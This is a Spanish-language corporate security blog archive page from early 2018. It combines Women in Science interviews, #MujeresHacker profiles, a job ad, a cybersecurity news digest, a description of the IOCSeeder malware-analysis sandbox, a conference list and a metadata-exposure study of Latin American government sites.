En ElevenPaths queremos celebrar hoy y mañana el Día Internacional de la Mujer y la Niña en la Ciencia. Desde la compañía, trabajamos para impulsar la diversidad de nuestros proyectos y también de los profesionales que los llevan a cabo. Apoyamos a todas aquellas personas que tienen un sueño para que trabajen duro, luchen y logren alcanzarlo, independientemente de su género o edad. Lamentablemente, en la actualidad, la brecha de género en los sectores de la ciencia, la tecnología, la ingeniería y las matemáticas (STEM) persiste desde hace años en todo el mundo. A pesar de que la participación de las mujeres en las carreras de grado superior ha aumentado enormemente, aún no están suficientemente representadas en estos campos. Con el fin de lograr el acceso y la participación plena y equitativa en la ciencia para las mujeres y las niñas, y además para lograr la igualdad de género y el empoderamiento de las mujeres y las niñas, la Asamblea General de las Naciones Unidas decidió proclamar el 11 de febrero como el Día Internacional de la Mujer y la Niña en la Ciencia. En este marco, hemos querido hacer una acción especial y hemos seleccionado a una niña, que representa el futuro de la tecnología, y a una mujer, que representa el presente, para que nos cuenten como ven esta ciencia desde su punto de vista. Este primer post lo protagoniza una de nuestras #NiñasHackers, Constanza Fernández, que con 11 años, ya tiene claro que quiere dedicarse al mundo de la tecnología. Hemos hablado con Constanza y esto ha sido lo que nos ha contado: ¿Qué haces en tu tiempo libre? Depende del día, habitualmente programo videojuegos o placas para robots. Otras veces, normalmente los fines de semana, mi tía me escribe problemas de matemáticas para que los resuelva. ¿Qué estudios te gustaría cursar cuando finalices el colegio? Me gustaría hacer más de una carrera universitaria, pero siempre de ciencias: ingeniería informática, electrónica, física o algo similar. ¿Cómo imaginas tu vida profesional cuando tengas 30 años? Me gustaría trabajar en la NASA, construir cohetes y poder programarlos. Que mis proyectos lleguen a Marte o a la Luna. Eso me encantaría. ¿Por qué quieres dedicarte a la tecnología/ robótica/ matemáticas, etc.? En mi opinión, la tecnología es súper interesante y está muy chula. Me permite formarme y trabajar para llegar a ser lo que me proponga en el futuro pero también me hace muchas de las cosas que me gustan. ¿Quién es tu referente femenino en el mundo de la Ciencia? Tengo más de uno, pero los dos principales son mi madre y mi tía. Mi madre sabe mucho sobre física y matemáticas. Y mi tía, porque me anima y motiva a practicar matemáticas y a utilizar los ordenadores para programar. Me encanta pasar tiempo con ellas. ¿Qué significa la tecnología para ti? La tecnología significa un mundo interesante lleno de puertas abiertas para niñas como yo. Trabajar en tecnología está lleno de posibilidades, voy a poder elegir lo que quiero hacer. ¿Qué te gustaría inventar si te dedicaras al mundo de la tecnología? Me gustaría construir naves espaciales o cohetes. Además, desde pequeñita, siempre he querido diseñar y fabricar un coche con alas. Estoy segurísima de que en un futuro existirán. ¿Cómo te imaginas la tecnología del futuro? Me la imagino con robots de inteligencia artificial, con asistentes como AURA o Siri. También, me imagino aparatos o máquinas muy avanzadas que puedan hacer cosas por sí mismas, que tú les digas que hacer y ellas lo hagan por ti. Cuéntanos alguna anécdota de la que te sientas especialmente orgullosa. Me siento muy orgullosa de Germín, un robot que hice el año pasado en el colegio. Me costó mucho trabajo pero, al final, conseguí sacarlo adelante gracias a mi esfuerzo y a Juan Antonio, mi profesor, que me ayudó a crearlo. En función de donde ponía mi mano, Ceremín encendía o apagaba una luz, se movía o sonaba una nota musical entre 'do' y 'si'. Fue una pasada. » Día Internacional de la Mujer y la Niña en la Ciencia, 11 de febrero (Parte 2) Constanza Fernández de Oñate #NiñaHacker
10 de febrero de 2018
Historias de #MujeresHacker: Mayte Miranda Cervantes, experta en ciberseguridad de Telefónica
Esta semana os traemos el relato de Mayte Miranda Cervantes, Product Manager de ciberseguridad, que con su pasión y constancia forma parte del sector tecnológico dejando a un lado la consideración de género. Mayte Miranda Cervantes, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: De niña no tenía claro lo que quería estudiar, las ciencias me llamaban la atención, además tenía un juego de química, y participaba en ferias de geografía y química, pero tengo que confesar que en aquel momento, las matemáticas no eran lo mío. La imaginación y la creatividad siempre me han caracterizado, me emocionaba aprender cosas nuevas y por eso me llamaban "nerd" muchas veces, cosa que a día de hoy hasta me gusta. En el momento en el que tuve que elegir mis estudios pensé en estudiar Diseño Gráfico, me apasionaba y mis profesores decían que tenia talento para ello. Después de pensármelo mucho, decidí decantarme por Informática en la Universidad Nacional Autónoma de México. Durante mis estudios, realicé una estancia en la Facultad de Ingeniería en Sistema en la Fachhochschule de Wiener Neustadt Austria. Además, en aquella época tuve m i primer contacto con la Ciberseguridad, fue en una charla para entrar al plan de becarios de Seguridad de mi Universidad. En ese momento fue cuando conocí la figura del hacker y ví que era el que tenía la capacidad para manipular el sistema tradicional gracias a sus conocimientos técnicos y supe que quería ser uno de ellos. Actualmente, trabajo como Product Manager de Ciberseguridad, y mi tarea es llevar el ciclo de vida de las soluciones de Seguridad en lo técnico y en el negocio para Telefónica México. Mi carrera en informática empezó hace 10 años y durante este tiempo he estado en el área de Infraestructura, realizando administración de plataformas de misión crítica y como Project Manager gestioné proyectos de desarrollo, telecomunicaciones y Ciberseguridad. Este año además, participé en la conferencia Hacking Ético en la Barcamp Bogotá edición “Mujeres en la seguridad”. Como consejo, les diría a las mujeres que quieren dedicarse a la Ciberseguridad que no existe una combinación única y eficaz de capacidades, pero que el pensamiento lógico, la creatividad, la imaginación y ser autodidacta, les ayudará en este campo y en general a realizar con éxito cualquier tarea. Cuando fui becaria de Seguridad hubo un momento en el que quise dejarlo porque me resultaba muy difícil y no tenia el mismo expertise que mis compañeros, sin embargo un profesor me dijo que continuara, que la Ciberseguridad se volvería más relevante en los años venideros y que el hecho de tener que esforzarme más no me hacia mala sino todo lo contrario. Esas palabras me motivaron y a la fecha no las olvido. Para mí la Ciberseguridad es una comunidad en la que he encontrado gente dispuesta a colaborar y a grandes amigos, si bien en su mayoría es una comunidad de hombres, las mujeres no debemos tener miedo. Los hombres y las mujeres no siempre hemos tenido las mismas oportunidades y el terreno ganado se lo debemos a las mujeres que han ido al frente hackeando el sistema para que podamos elegir nuevas profesiones y caminos. Les diría a las mujeres que les interesa la Ciencia o la Tecnología que no vean la palabra "nerd" como algo negativo, que escuchen su instinto y que no dejen la batalla sólo porqué creen que no son buenas en matemáticas, si algo te cuesta más trabajo no significa que no sea para ti. Tenemos muchas opciones y no siempre tenemos que elegir lo convencional, lo que ya está probado. Las cosas para las que naturalmente somos buenos y no nos requieren esfuerzo no siempre son lo que nos hace más felices. Realmente, mis mayores satisfacciones han resultado de hacer lo que más miedo me da y lo que no necesariamente es mi fuerte pero sí mi pasión. Mayte Miranda Cebrián Cyber Security Product Manager @meg056 Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica » Elena Díaz, Data Scientist de Telefónica » María Domínguez, experta en productos de ciberseguridad en Telefónica » Ana Molina, Service Designer en Telefónica Aura
9 de febrero de 2018
Trabaja con Javi Espinosa, ingeniero en la unidad Chief Data Office (CDO) de Telefónica
Soy Javi Espinosa y formo parte del equipo de ingeniería de la unidad Chief Data Office (CDO) de Telefónica donde trabajo desde hace algo más de 4 años en el equipo de Chema Alonso. En nuestra unidad desarrollamos proyectos tecnológicos innovadores dentro de una de las telco más importantes del mundo. Nos esforzamos para transformar la vida de las personas, creando nuevos servicios y vías de comunicación, algo muy gratificante, tanto en el ámbito profesional como en el personal. En el día a día, generalmente trabajamos con scrum en los proyectos, tenemos una pequeña ‘ daily’ al empezar el día para revisar el estado del proyecto y planificar la jornada. En la oficina tenemos un ambiente muy bueno, somos una mezcla de gente joven con gente que tiene mucha experiencia, personas de las que podemos aprender constantemente; por lo que para mi: se dan las circunstancias ideales de como una empresa tiene que concebir sus unidades ingeniería de software. Al final del día suelo dedicar unos minutos a revisar código de mis compañeros, tanto para mejorar la calidad de lo que hacemos, como para aprender de ellos y también analizar los comentarios sobre mi propio código. Si te gusta la tecnología y la innovación, si apuestas por las buenas prácticas de desarrollo, te preocupas por la calidad del código y te gustaría crear algunos de los nuevos proyectos que Telefónica presentará en el Mobile World Congress ’18, el próximo mes de marzo, esto te interesa: El equipo de talento de Telefónica está seleccionando personas para estas vacantes: • Senior Cognitive Developer • UX Researcher • VoIP Software Developer • Android Tech Lead • QA • Release Engineer • Full Stack Developer Si crees que estás preparado para ser parte de una de las compañías telco más potentes del mundo y te gustaría hacer software en una de las mejores unidades de España, no lo dudes. ¡Ven a trabajar con nosotros! #TalentoTelefónica. Javier Espinosa Software Engineer @javiesga javi@11paths.com
7 de febrero de 2018
#CyberSecurityPulse: Ups, salí a correr y publiqué información de localizaciones secretas
La aplicación de seguimiento de fitness llamada Strava publicó el pasado 1 de noviembre un mapa de calor que mostraba la actividad de sus usuarios en todo el mundo, pero desafortunadamente, el mapa revelaba información que no debería haber sido expuesta en internet. Strava, que se promociona como una aplicación de redes sociales para deportistas, al poner a disposición de todo el mundo la ubicación de todas las carreras realizadas por sus usuarios recopiladas por sus teléfonos publicó información sobre bases militares estadounidenses en todo el mundo. Según el analista Nathan Ruser, el mapa incluía las rutas de entrenamiento de soldados en localizaciones secretas, incluyendo bases en Afganistán y Siria, una presunta base de la CIA en Somalia e incluso el Área 51. Sin embargo, información procedente de sistemas cartográficos sobre instalaciones de interés para la defensa, como bases militares, siempre ha estado disponible. Sujeta a errores o inexactitudes, pero siempre disponible dada la incapacidad de los gobiernos para limitar su difusión. En este sentido, este tipo de información ha sido utilizada para perpetrar ataques, hasta el punto de que India se planteara en 2009 el cierre de Google Earth como medida para evitar atentados como los de Bombay. Desde el punto de vista de la privacidad, Strava no es la única plataforma que expone información de sus usuarios por defecto. Endomondo también permite conocer los hábitos, horarios y estado de salud de sus usuarios. O, hace unos años, con la configuración por defecto de Twitter, se podía conocer desde dónde se publicaban los tweets de un usuario. O, por ejemplo, con Tinder es posible localizar nuestro objetivo en todo momento, conociendo en qué zona se encuentra, cuándo va a trabajar, qué rutas toma o si se encuentra en la ciudad. Este caso es otra demostración de la necesidad de evaluar el nivel de información expuesta de una organización y más si se trata de instalaciones de interés para la defensa e incluir esta amenaza como parte de los planes de contrainteligencia de este tipo de organizaciones. Más información en The Hacker News Noticias destacadas Cientos de ethers robados tras un phishing a inversores de la ICO de Bee Token Inversores que esperaban su oportunidad de unirse a la ICO de Bee Token vieron robados sus ethers. Los estafadores lograron ponerse en la lista de correo Bee Token y enviaron un phishing en donde se indicaba que la ICO ya estaba abierta, seguida de la dirección de Ethereum para enviar sus contribuciones. Para tratar de atraer a los inversores, también declararon que habían formado una asociación sorpresa con Microsoft y que les daría a los participantes una bonificación del 100% por todas las contribuciones en las próximas seis horas, además de garantizar que el valor de Bee Token se duplicaría en 2 meses y que, de no ser así, recibirían su inversión de vuelta. Más información en The Ripple Cryptocurrency Rusia obliga a empresas tecnológicas a revisar su código Los principales proveedores mundiales de tecnología como SAP, Symantec y McAfee han permitido a las autoridades rusas buscar vulnerabilidades en su software profundamente integrados en el gobierno de los Estados Unidos, según ha descubierto una investigación de Reuters. Para vender en el mercado ruso, sobre todo en mercados críticos como energía y sector financiero, las compañías tecnológicas deben permitir a una agencia de defensa rusa que revise el funcionamiento interno o el código fuente de algunos de sus productos. Las autoridades rusas dicen que las revisiones son necesarias para detectar errores que podrían ser explotadas por terceros. Sin embargo, el Pentágono y empresas privadas ya ha expresado su preocupación ya que permitir que Rusia revise el código fuente puede exponer vulnerabilidades desconocidas que podrían usarse para socavar la defensa de Estados Unidos. Más información en Reuters Noticias del resto de la semana Corea del Sur advierte sobre un 0-day en Flash explotado por Corea del Norte Según la alerta publicada por KISA, la vulnerabilidad afecta a la última versión de Flash Player 28.0.0.137 y anteriores. El 0-day podría explotarse mediante un ataque engañando a las víctimas para que abran un documento, página web o correo electrónico que contenga un archivo Flash. Según el investigador Simon Choi, el 0-day ha sido explotado por Corea del Norte desde mediados de noviembre de 2017. Los atacantes explotaron esta vulnerabilidad en ataques dirigidos a individuos surcoreanos involucrados en actividades de investigación en Corea del Norte. Más información en KISA WannaMine, el minador que se propaga a través del exploit EternalBlue de la NSA WannaMine es un minador de criptomonedas de Monero que secuestra los ciclos de CPU. Este malware sin fichero aprovecha tácticas y técnicas avanzadas para mantener la persistencia dentro de una red y moverse lateralmente de un sistema a otro. Primero, WannaMine usa las credenciales adquiridas por Mimikatz para intentar propagarse y moverse lateralmente con credenciales legítimas. En el caso de no tener éxito, WannaMine intenta acceder al sistema remoto con el exploit EternalBlue utilizado por WannaCry a principios de 2017. Más información en CrowdStrike Se han robado casi 500 millones de dólares de Coincheck Coincheck, un exchange de criptodivisas con sede en Tokio, ha sufrido lo que parece ser el mayor robo en la historia de las criptomonedas, perdiendo 532 millones de dólares en activos digitales (casi 420 millones de dólares en tokens NEM y 112 millones en Ripples). El intercambiador ya ha informado del incidente a las autoridades policiales y a la Agencia de Servicios Financieros de Japón para investigar la causa de los tokens robados. Más información en Coincheck Otras noticias Una nota filtrada sugiere que la NSA y el Ejército de Estados Unidos comprometieron Tor, I2P, VPN y quieren desenmascarar usuarios de Monero Más información en Security Affairs JenX Botnet se aprovecha de la comunidad de videojuegos Grand Theft Auto para infectar dispositivos Más información en Radware Operación PZChao, una posible vuelta de Iron Tiger APT Más información en Bitdefender ¡Regístrate a la newsletter!
6 de febrero de 2018
IOCSeeder. Análisis dinámico de malware mediante sandboxing para generación de IOCs
IOCSeeder proporciona un punto de acceso unificado para el análisis dinámico de malware, que permite un estudio bajo demanda del comportamiento, propagación y las acciones llevadas a cabo por malware de distinta naturaleza. Este sandbox avanzado se encarga de la detonación, monitorización y análisis de malware en un entorno controlado, donde extrae información específica y detallada para crear o completar Indicadores de compromiso. Permite la inyección de conocimiento en otros procesos de detección de amenazas y vulnerabilidades. IOCSeeder forma parte del conjunto de proyectos ejecutados en la primera convocatoria del Reto Ciberseguridad y Big Data del área del Chief Data Office, un programa renovado que permite a estudiantes que se encuentran finalizando sus estudios universitarios desarrollar proyectos de innovación, guiados por la pasión por la tecnología, con la ventaja de responder a necesidades y condiciones reales. De esta manera el seguimiento desde las unidades de Telefónica permite una mentorización profesional especializada en la materia que impulsa la promoción de talento dirigido a innovación. El desarrollo de IOCSeeder viene precedido de la demanda constante de aumentar las capacidades de detección temprana de amenazas en las soluciones y servicios de ElevenPaths. Para ello, los objetivos eran: Optimizar los procesos de recogida de datos que mejoren las medidas predictivas de posibles acciones maliciosas Alto nivel de precisión al recoger el comportamiento del software Generación de indicadores inequívocos de actividades sospechosas Clasificación y visualización human-friendly de las detecciones encontradas Funcionamiento Un IOC es una descripción de un incidente de ciberseguridad, un elemento malicioso o una actividad desarrollada, recogida mediante patrones de comportamiento y características parametrizables, lo que permite identificar y detectar de manera anticipada amenazas de seguridad. Para una correcta y minuciosa caracterización del software mediante IOCs es fundamental obtener la información de dónde proceden estos indicadores, y por tanto del comportamiento del software que los origina. IOCSeeder aborda esta problemática creando un sandbox basado en Cuckoo donde, vía fichero, URL o IP, realiza la detonación de malware que son parametrizados de acuerdo al estándar de IOCs adecuado para interactuar con el resto de servicios de ElevenPaths. Al estar concebido para procesar grandes volúmenes de trabajo, IOCSeeder garantiza el paralelismo de análisis utilizando un pool de procesos (workers), que permiten al sistema adecuarse al conjunto de recursos disponibles para simultanear la detonación de muestras. Determinados casos de uso requerirán el uso continuado y reiterativo de muestras, enviando conjuntos de ficheros/URLs por lotes y por ello se ha tenido en cuenta la capacidad de escalabilidad del sistema. Esto supone que cada detonación despliega una nueva máquina virtual con su propia unidad de sandboxing para cada muestra. El panel de administración incluye información sobre qué instancias se están desplegando para detonar (uploaded), cuáles muestras están en pleno proceso de análisis (pending) y cuales han sido ya procesadas (reported). Encolado y lista de tareas El backend de IOCSeeder alimenta una base de datos MongoDB que recoge concurrentemente la información suministrada por cada una de las instancias desplegadas en cada worker. Los datos generados por los sandboxes son divididos entre aquellas características útiles para los IOCs, y el resto de datos adicionales derivados del análisis, cuya información no posee valor en la detección, pero sí puede ser clave para futuros usos en diagnósticos y como conjunto datos para usos forenses. Esta generación mixta de IOCs + Vector de características adicional queda ligada en nuestro conjunto de datos y siempre podrá ser recuperado en caso de que se quiera ahondar en detalles técnicos de su detonación y evolución. Ejemplo de listado de peticiones web Gracias a todo el conjunto de información obtenido y todo el procesamiento, IOCSeeder es capaz de ofrecer un resumen con las características más importantes para identificar la muestra analizada junto a una valoración de la peligrosidad que supone la ejecución. Esta puntuación intuitiva permitiría a los administradores de sistema anticipar el grado de alerta que deben incorporar ante los potenciales riesgos de encontrar una coincidencia con un IOC obtenido por IOCSeeder. Información de la muestra y valoración Como ocurre en estos casos u no de los principales retos fue la configuración del entorno virtualizado, cuyas características de monitorización, análisis y supervisión deben pasar inadvertidas para la muestra detonada. El sistema debe ser aislado y controlado, pero resulta a su vez de vital importancia incorporar mecanismos para evitar que las propias muestras detecten que están siendo intencionalmente ejecutadas. IOCSeeder incorpora módulos personalizados para este propósito que pueden evolucionar a medida que el software incorpora mejoras de detección de sandboxing. Integración en el ecosistema de ciberseguridad Ecosistema IOCSeeder fue concebido como complemento a distintos productos como Tacyt o servicios como CyberThreats y Vamps. Alimentando en forma de IOCs todos aquellos procesos destinados a la detección de vulnerabilidades y amenazas. Además, su diseño acomoda la hoja de ruta de mASAPP, para delegar en éste el sandboxing de aplicaciones móviles. De esta manera ambos pueden trabajar de forma coordinada y en simbiosis, especializando los análisis de manera óptima ya sean aplicaciones tanto para estaciones de escritorio como dispositivos móviles. Dentro del ecosistema de elementos de ciberseguridad de ElevenPaths, IOCSeeder sería una pieza más del conjunto de herramientas de ciberseguridad disponibles. Cuya función puede ser aprovechada por el resto, pero que de forma autónoma proporciona en sí misma una valiosa plataforma para generar información relacionada con ficheros, URLs e IPs sospechosas. Objetivos y roadmap A la conclusión de este Trabajo Fin de Máster, IOCSeeder ha cubierto los requisitos esperados sobre la generación de IOCs, de forma precisa, sin alejarnos del plano humano para permitir la interpretación de sus informes. La prueba de concepto obtenida es capaz de ejecutar el sandboxing de aplicaciones de escritorio, generar IOCs conforme al estándar de ElevenPaths y enriquecer esta parametrización con un vector de características muy valioso donde se incluye una valoración del riesgo o la peligrosidad de la muestra analizada. A medio plazo, IOCSeeder puede seguir evolucionando sus capacidades, donde tendrá que poner a prueba su capacidad de escalabilidad para grandes lotes de trabajo, por ejemplo, el análisis de directorios completos de muestras procedentes de la CTA. También debe mejorar sus módulos antisandboxing que evitan que las muestras detonadas detecten que están desplegándose en entornos virtualizados. Y, por último, hay que ahondar en la planificación de cómo IOCSeeder puede integrarse con el resto del productos de ElevenPaths, una acción clave para completar el puzzle de la ciberseguridad y finalmente demostrar el elevado potencial como generador de IOCs que posee esta herramienta. Adrián Rodríguez García Con la colaboración de Innovación y laboratorio www.elevenpaths.com
5 de febrero de 2018
Conferencias, talleres y eventos del mes de febrero en los que participamos
Un mes más, te traemos el listado de los eventos en los que participan los expertos, analistas de inteligencia y Chief Security Ambassadors (CSAs) de ElevenPaths en febrero. Busca un bolígrafo y apúntate aquellos que te interesen, ¡no van a ser pocos! SegurXest Este año es la primera edición de las Jornadas de Seguridad Informática cuyo objetivo es ser un referente en temas de seguridad en el mundo de la Educación, y concretamente, en el de los Ciclos de Informática de Formación Profesional para impulsar las salidas profesionales en dicho ámbito. El evento, celebrado el pasado 30, 31 de enero, y 1 de febrero, en Valencia, tuvo como invitado a nuestro experto Fran Ramírez que habló sobre la anatomía de un malware moderno. HackRon2018 Esta importante cita del sector presentará las investigaciones en ciberseguridad más punteras del panorama internacional, nacional e insular, los días 8 y 9 de febrero, en Santa Cruz de Tenerife, Canarias. El jueves, 8 de febrero, dos de nuestros mejores expertos, Pablo San Emeterio y Pablo González, impartirán varios talleres sobre la iniciación al exploiting y Metasploit. Nuestro Chairman , Chema Alonso, también asistirá al congreso pero, en su caso, dará una charla motivacional por videoconferencia. CyberGasteiz: Jornadas de Ciberinteligencia y Ciberseguridad A finales de este mes, del 28 de febrero al 1 de marzo, los analistas de inteligencia, Yaiza Rubio y Félix Brezo, participarán en estas jornadas que se celebrarán en Vitoria. Además de ellos, asistirán expertos provenientes del sector público y privado que hablarán de temas conceptuales ligados a la Ciberinteligencia, analizando acciones de inteligencia en el ciberespacio y debatiendo sobre el futuro a corto, medio y largo plazo de esta disciplina. RootedCON2018 El congreso de seguridad informática nació con el propósito de promover el intercambio de conocimiento entre los miembros de la comunidad de seguridad, en particular reivindicando la enorme capacidad de los profesionales hispano-parlantes. Durante los días 26, 27 y 28 de febrero, nuestro experto y CSA, Pablo San Emeterio, impartirá un Bootcamp sobre exploiting. A su vez, Pablo González, impartirá dos Rootedlab, uno sobre Metasploit y otro sobre Hacking Ético. Ya puedes apuntarte a aquellos talleres que te interesen en la web oficial del evento. Incibe: Día de Internet Seguro 2018 El Instituto Nacional de Ciberseguridad organiza esta jornada el próximo martes, 6 de febrero, debido al día Internacional de Internet Seguro. El objetivo que tiene esta jornada es crear, conectar y compartir respeto en internet. La hacker Yaiza Rubio dará una charla motivacional durante las jornadas que dará qué hablar. H-CON: HackPlayers' Conference No te pierdas esta I edición de la conferencia sobre Hacking y Ciberseguridad de hackplayers.com a la que asistirá nuestro experto Santiago Hernández. Tendrán lugar los próximos 2 y 3 de febrero, en el Campus Sur de la Universidad Politécnica de Madrid. Ya tienes todos los eventos en los que participamos este mes, acude a aquellos que te interesen y estate atento a nuestro canal de Twitter, hablaremos de ellos. Más información en elevenpaths.com/eventos
4 de febrero de 2018
¿Qué revelan los metadatos de los estados de Lantinoamérica?
En esta era donde los gobiernos de todo el mundo sufren las transformaciones digitales y permiten a los ciudadanos de sus países que la información y los tramites sean de fácil acceso a través de los mecanismos que les ofrece la tecnología, es vital que se tomen todas las medidas de protección posibles para garantizar que la información no entregue datos sensibles o que puedan poner en riesgo a los gobiernos. Cada archivo digital que se pone a disposición del público, expone no solo la información que la entidad quiere que la ciudadanía pueda tener, sino también contiene todos los metadatos que los compone. En estos es posible encontrar datos sobre infraestructura y usuarios de las entidades gubernamentales, permitiendo a los delincuentes con estos datos perfilar un ataque cibernético más efectivo. Es por esto que se realizó una investigación con el objetivo de determinar los niveles de madurez en los controles que usan los gobiernos en Latinoamérica para prevenir la fuga de información a través de metadatos, realizando un análisis con la información recolectada de los documentos públicos, que permita usar los datos recolectados para el perfilamiento de un ataque cibernético. Por ello, se buscan datos sobre sistemas operativos, correos electrónicos, nombres de usuarios, configuraciones genéricas, características los servicios web expuestos, entre otros. Para determinar el dominio de cada estado, se utilizó el informe generado por el Banco Interamencano de Desarrollo que nos permite determinar que los dominios de los 20 países con mayor exposición digital en Latinoamérica son los siguientes: Usando nuestra nueva FOCA Open Source, se realizó la búsqueda de archivos de cada uno de los dominios. Se analizaron un total de 30890 archivos digitales, donde el 86% son archivos de ofimática, como documentos de texto, cuadros de datos, presentaciones y archivos. Como se indicó anteriormente, la investigación se orientó a extraer datos que pudieran ser usados por delincuentes para perfilar un ataque cibernético contra las entidades del gobierno. Por lo tanto, se buscaron datos que permitían determinar características de las infraestructuras y que permitieran suplantar la identidad de los funcionarios, encontrando más de 18000 nombres de usuarios y más de 3800 direcciones IP de los diferentes servidores, entre otros datos. Con esta información hemos desarrollado una completa investigación que nos revela que los metadatos expuestos por las entidades gubernamentales permiten a los delincuentes cibernéticos poner en riesgo la información de los ciudadanos de todos los países y que se requiere de una implementación de controles que mitiguen este riesgo de manera urgente. Diego Samuel Espitia Montenegro Chief Security Ambassador, Colombia @dsespitia diego.espitia@11paths.com
3 de febrero de 2018
Historias de #MujeresHacker: Ana Molina, Service Designer en Telefónica Aura
Esta semana presentamos la historia de Ana Molina que, como Service Designer en Telefónica Aura, sirve de inspiración por su dedicación al diseño de productos y servicios de la compañía. Ana Molina, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: De pequeña quería hacer anuncios de Coca-Cola ya que mi padre se dedicaba al mundo de la comunicación. En su empresa había un estudio de diseño y todavía me acuerdo de la primera vez que vi un Mac y una mesa de luz. Me pareció alucinante que se pudiera dibujar dentro de esa máquina y que cuando el diseñador se equivocaba sonara “quack”. En ese momento, y siendo una niña, tenía claro lo que quería ser de mayor, aunque poco se parece a lo que hago actualmente. En el momento de decidir qué estudios escoger y, como siempre me había gustado la comunicación, decidí estudiar la carrera de Publicidad y Relaciones Públicas. En ese último año empezó un gran movimiento en torno a Internet. Esto llevó a que la Fundación Areces estuviera buscando profesionales y así conseguí una beca en el Máster de Redes e Internet impartido por la Universidad Politécnica de Madrid. Una vez acabé ese período de estudios, y en general durante toda mi vida profesional, he cambiado muchas veces de camino y he aprendido diferentes disciplinas. Al principio diseñaba webs corporativas en un estudio en Barcelona, la ciudad a la que me fui a trabajar después de mi último verano de Universidad. Poco a poco empezamos a diseñar cosas más funcionales, trabajábamos con bancos y con portales de contenidos. Estuve a punto de matricularme en informática, pero la mitad de mis compañeros eran autodidactas así que me dediqué a hacer cursos (Actionscript, Asp, Mysql, Redes, Css), a acudir a charlas y a investigar por mi cuenta. Aunque mi trabajo no estaba directamente relacionado con eso me ayudó mucho a entender los requisitos y las necesidades de los proyectos en los que estaba involucrada. Seguí investigando sobre usabilidad e interacción, sobre cómo hacer fácil lo difícil y sobre cómo democratizar los servicios digitales y la digitalización. Poco a poco me dí cuenta que mi mayor valor era diseñar productos y servicios, no solo interfaces. A la industria le ha costado interiorizar el diseño de producto y la investigación con usuarios como parte del proceso. Sin embargo, nadie se plantea que no exista un proceso de diseño en un automóvil o en un edificio. Ver cómo todo eso está cambiando en las grandes compañías es un lujo. Cuando empezamos a trabajar en Aura me gustó mucho el objetivo del proyecto, mejorar la relación con el cliente, simplificar y mejorar los servicios. Supongo que ese briefing es el sueño de cualquiera que se dedique a diseñar experiencias. A lo largo de toda mi carrera mi familia ha sido mi máximo referente y apoyo. Mi padre es la persona más emprendedora que conozco. En relación al ámbito profesional lo que vi en casa es que vivir fuera de la zona de confort era lo normal. También, aprendí que era mejor saber hacer muchas cosas diferentes y que, en general, los cambios son buenos. En casa nunca me dijeron, "¿porqué haces otro cambio?" o "¿porqué no te centras en un solo proyecto?" Al contrario, siempre vieron que me llenaba mucho la parte profesional, seguir aprendiendo, y nunca lo cuestionaron. Estoy agradecida por eso. Echando la vista atrás, supongo que la parte de entender a qué quieres dedicarte forma parte del camino. Por eso, mi consejo para las futuras generaciones es que tengan curiosidad por entender cómo funciona la tecnología, cómo impacta en la vida, y así tendrán más control de las decisiones que tomen. No hablo solo de ser ingenieros o desarrolladores, creo que el campo de las humanidades tiene mucho que aportar a la tecnología, es solo que tiene que reinventarse. Ana Isabel Molina Service Designer Aura @AM0LINA Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica » Marta Pérez, experta en User Research de Telefónica Aura » Elena Díaz, Data Scientist de Telefónica » María Domínguez, experta en productos de ciberseguridad en Telefónica
2 de febrero de 2018
¡Ya tenemos los resultados de #CDO Challenge!
¡Hola hackers! El pasado 29 de diciembre, a través de la unidad de Chief Data Office (CDO) de Telefónica, liderada por Chema Alonso, que integra Aura -Inteligencia Cognitiva-, ElevenPaths -Ciberseguridad-, LUCA -Big Data- y la Cuarta Plataforma, lanzamos la convocatoria CDO Challenge en busca de nuevos talentos apasionados por la tecnología aplicada a la inteligencia artificial en entornos de desarrollo Android. En esta ocasión, decidimos innovar en los procesos tradicionales de reclutamiento. Por eso, en lugar de seleccionar candidatos valorando sus currículums, desarrollamos un reto de programación, integrado en la app CDO Challenge, creada ad-hoc. Durante todo el mes de enero, los candidatos debían descargarse la app y descifrar un challenge de programación y, de este modo, conseguir una entrevista personal con nuestros expertos en las oficinas Distrito Telefónica en Madrid. La respuesta a esta iniciativa ha sido muy buena y queremos compartiros, a través de la siguiente infografía, los resultados obtenidos en nuestro CDO Challenge: Muchas gracias a todos los que habéis participado en el reto y también por la difusión y los mensajes recibidos en estas semanas. En los próximos días nos pondremos en contacto con los candidatos que hayáis resultado seleccionados. ¡Mucha suerte hackers! Síguenos en nuestras redes sociales: @Telefonica, @ElevenPaths y @LUCA_D3. ¡Nos vemos pronto con nuevas iniciativas!
31 de enero de 2018
"Confianza en el diseño seguro" vs. "Seguro, confiamos en el diseño" (Otra historia de Star Wars)
